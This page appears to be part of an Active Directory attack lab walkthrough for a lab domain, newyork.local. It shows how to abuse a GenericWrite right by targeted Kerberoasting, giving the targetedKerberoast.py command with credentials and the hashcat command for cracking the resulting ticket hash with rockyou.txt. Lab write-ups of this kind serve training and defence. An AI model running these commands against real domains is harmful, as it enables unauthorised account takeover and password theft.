GenericWrite on User (Hugo -> Ramon)

  • As we just set up Hugo.Chavez's password we will now exploit the GenericWrite from hugo.Chavez to Ramon.Maldonado

  • This could be abuse with 3 different ways :

    • shadowCredentials (windows server 2016 or +)

    • targetKerberoasting (password should be weak enough to be cracked)

    • logonScript (this need a user connection and to be honest it never worked or unless with a script already inside sysvol)

Target Kerberoasting

  • First let’s do a target Kerberoasting, the principle is simple. Add an SPN to the user, ask for a tgs, remove the SPN on the user.

  • And now we can crack the TGS just like a classic kerberoasting.

  • Shutdown have done a tool which do all the work for you : https://github.com/ShutdownRepo/targetedKerberoast

Install TargetedKerberoast.py

git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py

Get The Hash

python3 targetedKerberoast.py -v -d newyork.local -u hugo.Chavez -p 123456 --request-user Ramon.Maldonado

Crack Hash with RockYou.txt

hashcat -m 13100 -a 0 maldonado.hash rockyou.txt --force
PreviousForceChangePassword on User (Donald-> Hugo)NextWriteDacl on User (Ramon-> Nicolas)

Last updated